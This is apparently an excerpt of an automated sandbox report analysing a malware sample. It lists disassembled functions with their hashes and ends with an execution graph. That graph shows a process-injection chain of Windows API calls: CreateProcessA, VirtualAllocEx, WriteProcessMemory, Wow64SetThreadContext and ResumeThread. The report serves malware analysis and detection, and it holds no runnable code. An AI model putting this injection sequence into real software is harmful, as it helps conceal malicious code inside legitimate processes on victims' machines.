                                                • Instruction Fuzzy Hash: B511BE71904345CFD701EFA8C4483ADBFB0EF8A318F2456AED04AAB293D7319891C756
                                                Function 00209A20 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e84f32e3a8fdbf78cd3bb958bd98c5577f9d3d815fa6853fa80bb1efe748120c
                                                • Instruction ID: f9faa03a157456b0f727ebcdf207da21546b63f119968990471683bf386f0b1b
                                                • Opcode Fuzzy Hash: e84f32e3a8fdbf78cd3bb958bd98c5577f9d3d815fa6853fa80bb1efe748120c
                                                • Instruction Fuzzy Hash: 10012C75D00708DEDB00EFA8D5483EDFBB0EB89315F245569E00AB7292D7758AD4CB54
                                                Function 00200839 Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRp
                                                • API String ID: 0-3405495957
                                                • Opcode ID: 77be1ee2944aaf16f131f9a512b463f72a348d1b69003de3a352036385d441ef
                                                • Instruction ID: 382fd2bc85f391d945f1b62fca6793e398835762d437542c542318b76761e655
                                                • Opcode Fuzzy Hash: 77be1ee2944aaf16f131f9a512b463f72a348d1b69003de3a352036385d441ef
                                                • Instruction Fuzzy Hash: 1F52E678A00219CFCB55EF24D994B8EBBB6FF49301F8045A9D40AA7368DB34AD85CF44
                                                Function 00200848 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRp
                                                • API String ID: 0-3405495957
                                                • Opcode ID: 4f6f0113695111e6893692cb2a0c5fae6b05b014089dd728ad5071aa7a4ceca8
                                                • Instruction ID: be9c98d9a687a7833a20cda84641e5da22f4ae0f6e2657fbdcd0b129e37b7211
                                                • Opcode Fuzzy Hash: 4f6f0113695111e6893692cb2a0c5fae6b05b014089dd728ad5071aa7a4ceca8
                                                • Instruction Fuzzy Hash: 6F52E678A00219CFCB55EF24D994B9EBBB6FF49311F8045A9D40AA7368DB30AD85CF44
                                                Function 00201548 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XLu
                                                • API String ID: 0-3779928992
                                                • Opcode ID: 73d74798f7b6176407c870ade1d9b65ad52c682a8a87bfe159755019b2c8e421
                                                • Instruction ID: 82ebc534138b77c6945c8212cde84e5b71e9b146be9752e009c2945d75ce6c41
                                                • Opcode Fuzzy Hash: 73d74798f7b6176407c870ade1d9b65ad52c682a8a87bfe159755019b2c8e421
                                                • Instruction Fuzzy Hash: 68416074E103099FDB05EFA8C4917AEBBB2EF86300F5045A9D016AB396CB349955CB91
                                                Function 002015A0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XLu
                                                • API String ID: 0-3779928992
                                                • Opcode ID: e0ef7adf35e447a495a6679542562f86b10bd88d5a7161785b0f56e6eea93e77
                                                • Instruction ID: a44c48f7f4728c471918446f5cb555d8f9fb25eb27f743354801f970d9d28925
                                                • Opcode Fuzzy Hash: e0ef7adf35e447a495a6679542562f86b10bd88d5a7161785b0f56e6eea93e77
                                                • Instruction Fuzzy Hash: 32313D78E003099FDB05EFA8C4817BEBBB2EF86300F548469D415AB396DB349A51CF91
                                                Function 00205500 Relevance: .6, Instructions: 647COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1eabd7faf87cf8195a77f7856cff76f7c53e4b386aac4d4683c73ad07d1a0a4b
                                                • Instruction ID: da814af5c9c9bc9709b26e81be49dd6805cafe83b961c971b02c506d7e2f4adf
                                                • Opcode Fuzzy Hash: 1eabd7faf87cf8195a77f7856cff76f7c53e4b386aac4d4683c73ad07d1a0a4b
                                                • Instruction Fuzzy Hash: E0129770025202AF82503F75EABC16ABF66FF0F323785AE44B15AC1C259F7915C9DA62
                                                Function 00205B35 Relevance: .2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 574617b0a9d30d07c6b92b3bd0c016962a6940bdbf61f43aa8122372f2522f48
                                                • Instruction ID: 5c2b904009920b2324f8a1712585434822896ce876ff9dd27bf21124bd7e057c
                                                • Opcode Fuzzy Hash: 574617b0a9d30d07c6b92b3bd0c016962a6940bdbf61f43aa8122372f2522f48
                                                • Instruction Fuzzy Hash: 54519A700652029F96102F75EABC13EBF66FF4F327381AE04A16E81C61DF3910C5EA62
                                                Function 00209770 Relevance: .2, Instructions: 177COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a9986a6e553cafb760537159d28b58b04eb6546d2e717d78f747003d8727bed
                                                • Instruction ID: 58e55633f4f5241fbe3c12231bc8a2cab897be36761e62039d2f53aed2977ee3
                                                • Opcode Fuzzy Hash: 2a9986a6e553cafb760537159d28b58b04eb6546d2e717d78f747003d8727bed
                                                • Instruction Fuzzy Hash: 3A810370E002198FDB24DFA9C984B9DBBB1BF89304F208269D419AB392DB749985CF51
                                                Function 006C9960 Relevance: .2, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663383203.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6c0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7592d486df19fd32d70a27f921a20ef7bc75badf214fd54f991c633e9dfa069b
                                                • Instruction ID: 0d1b1d90e9e49e3711e906038c44ad2e86b12a81f0cda8ca7120c5721038ac1d
                                                • Opcode Fuzzy Hash: 7592d486df19fd32d70a27f921a20ef7bc75badf214fd54f991c633e9dfa069b
                                                • Instruction Fuzzy Hash: 6F71D374E00218CFDB18DFA9D985BADBBB2EF89300F248529D815AB359DB359D42CF50
                                                Function 006D4330 Relevance: .2, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663397367.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6d0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5af23b944adca8398c537d43fdc37ba817c5e407aa89786e23fdfe58b09bf3d
                                                • Instruction ID: 257e270ce2e787981cda78f512aeded68e652cf5b1417cec6e04d9b21c391936
                                                • Opcode Fuzzy Hash: a5af23b944adca8398c537d43fdc37ba817c5e407aa89786e23fdfe58b09bf3d
                                                • Instruction Fuzzy Hash: E971C374E00218CFDB18DFA5D981AADBBB2FF89300F64852AD415AB359DB359D42CF50
                                                Function 002067A1 Relevance: .2, Instructions: 152COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a6eb944c10ce777588d35e433a5cd785fdad99a45601fe421c3476350e3be2c
                                                • Instruction ID: 3fe38e14b615881012380601c3195aabc08386b91ae76f1fb13685262e9b4c3d
                                                • Opcode Fuzzy Hash: 3a6eb944c10ce777588d35e433a5cd785fdad99a45601fe421c3476350e3be2c
                                                • Instruction Fuzzy Hash: 63612234D00318CFDB15DFA4D894BAEBBB2FF88300F208629D805AB299DB755A85CF40
                                                Function 00205040 Relevance: .1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42878594558246155457fccccda8f395410e5cf15cf99c8b7c99db8fa89cc81a
                                                • Instruction ID: ec0ecb523e587c8eac9368632247b309bfa850a09ee9c61af46a541bcc314835
                                                • Opcode Fuzzy Hash: 42878594558246155457fccccda8f395410e5cf15cf99c8b7c99db8fa89cc81a
                                                • Instruction Fuzzy Hash: BB51A674E01218DFDB44DFA9D984A9DBBF2FF89300F24916AE419AB365DB309941CF10
                                                Function 002023E0 Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d607875c7b9e5c322ac9fedd659b956d01e0e715b48a54bda9265822d088bd86
                                                • Instruction ID: ca6196c4b27feecac3866e7ab488cb034f611197036bb1e4394068e99eb0af6b
                                                • Opcode Fuzzy Hash: d607875c7b9e5c322ac9fedd659b956d01e0e715b48a54bda9265822d088bd86
                                                • Instruction Fuzzy Hash: F6519478E11308CFCB48DFA9D59499DBBB2FF89300F609469E805AB365DB35A852CF50
                                                Function 002075A9 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a090de32c3aa4d0febd5fe4e5d3b321abd47916c95c663ff85c8f9b44cca378
                                                • Instruction ID: f521b030203904bc2f08867c1de2f7360349364fab28324a8e8da63122590e34
                                                • Opcode Fuzzy Hash: 2a090de32c3aa4d0febd5fe4e5d3b321abd47916c95c663ff85c8f9b44cca378
                                                • Instruction Fuzzy Hash: F451F174D11228CFCB64DF68C984BEDBBB2BB89301F5044AAD409A7391DB35AE85CF50
                                                Function 021B2AD8 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1df7d8ecb5acbbdf92acd42924abf57da09d65017379d2d7215c547f33df8adb
                                                • Instruction ID: 495da24970f9b105c70d5e435d2a00dd30973e8fb189b8400e1167de3a3c6984
                                                • Opcode Fuzzy Hash: 1df7d8ecb5acbbdf92acd42924abf57da09d65017379d2d7215c547f33df8adb
                                                • Instruction Fuzzy Hash: 8D5104B0D01218CFDB19CFAAD8887DDBBB2BF89314F10C52AD814AB294DB759949CF54
                                                Function 021B2C73 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb94126413438b73e0047229a0b47171b0de117ff0a3793ee282eeed4f21b8e5
                                                • Instruction ID: 2d1aadb56cbd6216c9dae993d78a40d3bd320a5c32dda533e3f65bec5b557538
                                                • Opcode Fuzzy Hash: fb94126413438b73e0047229a0b47171b0de117ff0a3793ee282eeed4f21b8e5
                                                • Instruction Fuzzy Hash: 1C510374D01208CFCB19CFA9D4846DDBBB1BF49315F20952AD825BB294D775988ACF14
                                                Function 022E1BC6 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8c65ee9314e9b5c810389eb7f53296128d24a393039dc4796ebd00797d4c32b
                                                • Instruction ID: d47a7a1bbfbd5f378228842f88bf1ae6b407dd5aa171556db603215fb1fba857
                                                • Opcode Fuzzy Hash: e8c65ee9314e9b5c810389eb7f53296128d24a393039dc4796ebd00797d4c32b
                                                • Instruction Fuzzy Hash: 04410274E10248CFCB04DFA9D594BEDBBF2BF49300F509129D409AB294DB745A46CF41
                                                Function 022E1BD0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bca7b702a1f5a91cddfb9ce21dfb6272783bd959c63bee0391a32984dfbd96f9
                                                • Instruction ID: 51f2b998219e1be87a3553d9b52601bfd06a5875c1e1b06aa3295d981c1790f1
                                                • Opcode Fuzzy Hash: bca7b702a1f5a91cddfb9ce21dfb6272783bd959c63bee0391a32984dfbd96f9
                                                • Instruction Fuzzy Hash: 7941D074E10208CFCB04DFA9D594BEDBBF2BF89300F509129D409A7298DB745A46CF51
                                                Function 001BD044 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663033050.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_1bd000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9146702ffaaeb88d35640a39ad2b9685f0e94721eb19a0c3fb85bdcb4cd7c3c
                                                • Instruction ID: 7a0771835053173259410ddda5b1ac4f9468a503779cbed15a035c92c20885f2
                                                • Opcode Fuzzy Hash: e9146702ffaaeb88d35640a39ad2b9685f0e94721eb19a0c3fb85bdcb4cd7c3c
                                                • Instruction Fuzzy Hash: 042104B1604344EFDB19DF24E8C4B66BB61FB84314F34C5A9F8494B246D73AD846CB61
                                                Function 002024C5 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 328c6515f0986737bb3dd895e943e04e5f1e0d10b79cfc4ce7a3682e3f31f353
                                                • Instruction ID: 243c804c721f41826b27e933ea8060ce104f3acc382554264b9f8e23d7b1cf99
                                                • Opcode Fuzzy Hash: 328c6515f0986737bb3dd895e943e04e5f1e0d10b79cfc4ce7a3682e3f31f353
                                                • Instruction Fuzzy Hash: A031B778E11308CFCB44DFA4E58499DBBB6FF49300B60946AE809AB364D731AC55CF10
                                                Function 0020E573 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b52d296efadfbb3c0159ea24a8a91224e2aa65f07ba27655d63e0b571fbcbb4f
                                                • Instruction ID: eedca9edb49fedc5006984b32e5e5aeea0d49274587e7985e37197944a2c739c
                                                • Opcode Fuzzy Hash: b52d296efadfbb3c0159ea24a8a91224e2aa65f07ba27655d63e0b571fbcbb4f
                                                • Instruction Fuzzy Hash: E9117274A102199FDF08DFA8D4C4AADFBB9FB98304F558925D804E7282D731A991CF10
                                                Function 002022DD Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db9dbd7f1084f631d09429400e8c16ae5cccd78cd72236a1635af90ceb7973d6
                                                • Instruction ID: 2ad92384e6615360d4787b410dd5cf2ea54fbbe65373f46685dcb237c0bdbc80
                                                • Opcode Fuzzy Hash: db9dbd7f1084f631d09429400e8c16ae5cccd78cd72236a1635af90ceb7973d6
                                                • Instruction Fuzzy Hash: B01103B0D14209CFCB01DFA8D8841EEBBB5BF4A300B5581A6D804B7255EB309A55CFA1
                                                Function 002066CD Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 522bcf7bae8c1f986f580f48312a2e368707b67453b4147e5b4789c257c73b44
                                                • Instruction ID: 1f34ea9daccc3edfaf5e1eb3fda9d4776133399819bad7a06f37c4e9eb8ce2e7
                                                • Opcode Fuzzy Hash: 522bcf7bae8c1f986f580f48312a2e368707b67453b4147e5b4789c257c73b44
                                                • Instruction Fuzzy Hash: 66216DB4900209DFCB45EFA8D58179EBBF5FF85300F50C9AAD0149B269EB309A49CF81
                                                Function 002066D0 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e51467912721d35d47f8c5a8fc9e82d7e9ec36dec0cd60691ee8f672cc8e903
                                                • Instruction ID: f7e2670fca4fa8ff970fedd02992db9e298ffddfdc2fdf010809ce0a84d39298
                                                • Opcode Fuzzy Hash: 2e51467912721d35d47f8c5a8fc9e82d7e9ec36dec0cd60691ee8f672cc8e903
                                                • Instruction Fuzzy Hash: CF116DB49002099FCB45EFA8D58179EBBF5FF84300F50C9AAD0149B259EB309A498B81
                                                Function 001BD03F Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663033050.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_1bd000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: bbb16061b5219b204c079a3943cd2242c02ccf0e0fc7af38194d9b3a0d5bbb32
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 9611DD75504280CFDB16CF24D9C4B55BFA1FB84314F28CAADE8494B256C33AD84ACFA2
                                                Function 00202320 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94ed9d73fa2f3607a9e263a0e530033d32b99647bd6188dc3de733b95f5cba11
                                                • Instruction ID: bc7f5c386cc110020e1a07b9bb88163a7466dbffeb1ba1ffc4ca5a553b70495b
                                                • Opcode Fuzzy Hash: 94ed9d73fa2f3607a9e263a0e530033d32b99647bd6188dc3de733b95f5cba11
                                                • Instruction Fuzzy Hash: 2821CE74C142198FCB04EFA8D9845EEBBF4BF4A300F1492AAD804F3251EB305A95CFA1
                                                Function 00205DCF Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7ef771a301ccf61ec9d4a6bb6c08f7dc9bd5112d98831af7c65c477a02a59c3
                                                • Instruction ID: 92750555c2cbd1660d53bd18bbc3c718144f344a626738f1e52d5b4fad2420b5
                                                • Opcode Fuzzy Hash: e7ef771a301ccf61ec9d4a6bb6c08f7dc9bd5112d98831af7c65c477a02a59c3
                                                • Instruction Fuzzy Hash: 17116D78D042499FCB02DFA4D8909AEBFB1FF4A300F4045A6D800E7365D7345A59CF91

                                                Non-executed Functions

                                                Function 022E2130 Relevance: 11.7, Strings: 9, Instructions: 461COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                • API String ID: 0-3547488823
                                                • Opcode ID: 0cc9cc49b0a84f069b61d20012980b7e984988a24d80b52cf639c64f398885ae
                                                • Instruction ID: b937e2f03170d9e772a21a449d2604a950a06dd88c9a2a0d2d4103458e0464b5
                                                • Opcode Fuzzy Hash: 0cc9cc49b0a84f069b61d20012980b7e984988a24d80b52cf639c64f398885ae
                                                • Instruction Fuzzy Hash: AD32B274E00218CFDB68CFA5C954B9DBBB2BF89300F5085A9D80AAB355DB719E85DF10
                                                Function 022E2121 Relevance: 11.6, Strings: 9, Instructions: 372COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                • API String ID: 0-3547488823
                                                • Opcode ID: f1aa1d1539581a44ea1c79723843591ce55aff64fbdb59c83b6066451a1e078e
                                                • Instruction ID: 881eb6cf0d1c174c07015fbe54ae97b572b503fd29cd16b7e56f0a65958776ef
                                                • Opcode Fuzzy Hash: f1aa1d1539581a44ea1c79723843591ce55aff64fbdb59c83b6066451a1e078e
                                                • Instruction Fuzzy Hash: 5602B0B4E00218CFDB58DFA5C954B9DBBB2BF89300F1085A9D809AB365DB719E85CF50

                                                Execution Graph

                                                Execution Coverage:17.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:89
                                                Total number of Limit Nodes:2
                                                execution_graph 8487 25eeb9 8488 25ede4 8487->8488 8489 25ee9e 8488->8489 8491 591010 8488->8491 8492 59102a 8491->8492 8498 59104e 8492->8498 8506 5914b5 8492->8506 8510 5917b3 8492->8510 8514 591a53 8492->8514 8518 591a3b 8492->8518 8526 591547 8492->8526 8531 591687 8492->8531 8535 591d6e 8492->8535 8541 591768 8492->8541 8546 591876 8492->8546 8550 591517 8492->8550 8555 591414 8492->8555 8560 5919b5 8492->8560 8498->8489 8507 5914e2 8506->8507 8565 25e8ac 8506->8565 8569 25e8b8 8506->8569 8507->8498 8573 25e520 8510->8573 8577 25e519 8510->8577 8511 5917d7 8511->8498 8581 25e680 8514->8581 8585 25e678 8514->8585 8515 591a75 8515->8498 8519 591cb2 8518->8519 8597 25e2c1 8519->8597 8601 25e2c8 8519->8601 8520 59150d 8521 591794 8520->8521 8589 25dda0 8520->8589 8593 25dd98 8520->8593 8521->8498 8527 591548 8526->8527 8529 25dda0 ResumeThread 8527->8529 8530 25dd98 ResumeThread 8527->8530 8528 591794 8528->8498 8529->8528 8530->8528 8605 25e3f1 8531->8605 8609 25e3f8 8531->8609 8532 5916bd 8532->8498 8536 591d7b 8535->8536 8537 591835 8535->8537 8539 25e520 WriteProcessMemory 8537->8539 8540 25e519 WriteProcessMemory 8537->8540 8538 59180d 8538->8498 8539->8538 8540->8538 8542 59176e 8541->8542 8544 25dda0 ResumeThread 8542->8544 8545 25dd98 ResumeThread 8542->8545 8543 591794 8543->8498 8544->8543 8545->8543 8548 25e520 WriteProcessMemory 8546->8548 8549 25e519 WriteProcessMemory 8546->8549 8547 5918a4 8548->8547 8549->8547 8551 591518 8550->8551 8552 591794 8551->8552 8553 25dda0 ResumeThread 8551->8553 8554 25dd98 ResumeThread 8551->8554 8552->8498 8553->8552 8554->8552 8556 59141e 8555->8556 8558 25e8ac CreateProcessA 8556->8558 8559 25e8b8 CreateProcessA 8556->8559 8557 5914e2 8557->8498 8558->8557 8559->8557 8561 59177f 8560->8561 8562 591794 8561->8562 8563 25dda0 ResumeThread 8561->8563 8564 25dd98 ResumeThread 8561->8564 8562->8498 8563->8562 8564->8562 8566 25e8b2 CreateProcessA 8565->8566 8568 25eb9d 8566->8568 8568->8568 8570 25e93f CreateProcessA 8569->8570 8572 25eb9d 8570->8572 8572->8572 8574 25e56c WriteProcessMemory 8573->8574 8576 25e60b 8574->8576 8576->8511 8578 25e56c WriteProcessMemory 8577->8578 8580 25e60b 8578->8580 8580->8511 8582 25e6cc ReadProcessMemory 8581->8582 8584 25e74a 8582->8584 8584->8515 8586 25e6cc ReadProcessMemory 8585->8586 8588 25e74a 8586->8588 8588->8515 8590 25dde4 ResumeThread 8589->8590 8592 25de36 8590->8592 8592->8521 8594 25dde4 ResumeThread 8593->8594 8596 25de36 8594->8596 8596->8521 8598 25e2c8 Wow64SetThreadContext 8597->8598 8600 25e38f 8598->8600 8600->8520 8602 25e311 Wow64SetThreadContext 8601->8602 8604 25e38f 8602->8604 8604->8520 8606 25e3f8 VirtualAllocEx 8605->8606 8608 25e4ba 8606->8608 8608->8532 8610 25e43c VirtualAllocEx 8609->8610 8612 25e4ba 8610->8612 8612->8532

